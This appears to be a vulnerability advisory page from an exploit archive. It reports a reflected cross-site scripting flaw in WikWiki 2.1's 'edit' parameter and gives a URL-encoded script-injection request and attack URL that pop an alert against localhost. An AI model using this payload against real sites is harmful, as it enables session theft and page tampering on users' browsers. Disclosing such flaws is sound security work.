WikWiki 2.1 Cross Site Scripting

2016.08.03

Credit: HaHwul

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: WikWiki - Reflected XSS
# Date: 2016-08-01
# Exploit Author: HaHwul
# Vendor Homepage: https://github.com/smasty/WikWiki
# Software Link: https://github.com/smasty/WikWiki/archive/master.zip
# Version: v2.1
# Tested on: Debian[Whezzy]
# CVE : none

### Vulnerability Point
Edit page is not filtered special char.
Inject html code on root directory and edit parameter.

### Attack Request
GET /?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7 HTTP/1.1
Host: 127.0.0.1
...snip..

### Attack URL
http://127.0.0.1/vul_test/WikWiki/?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WikWiki 2.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.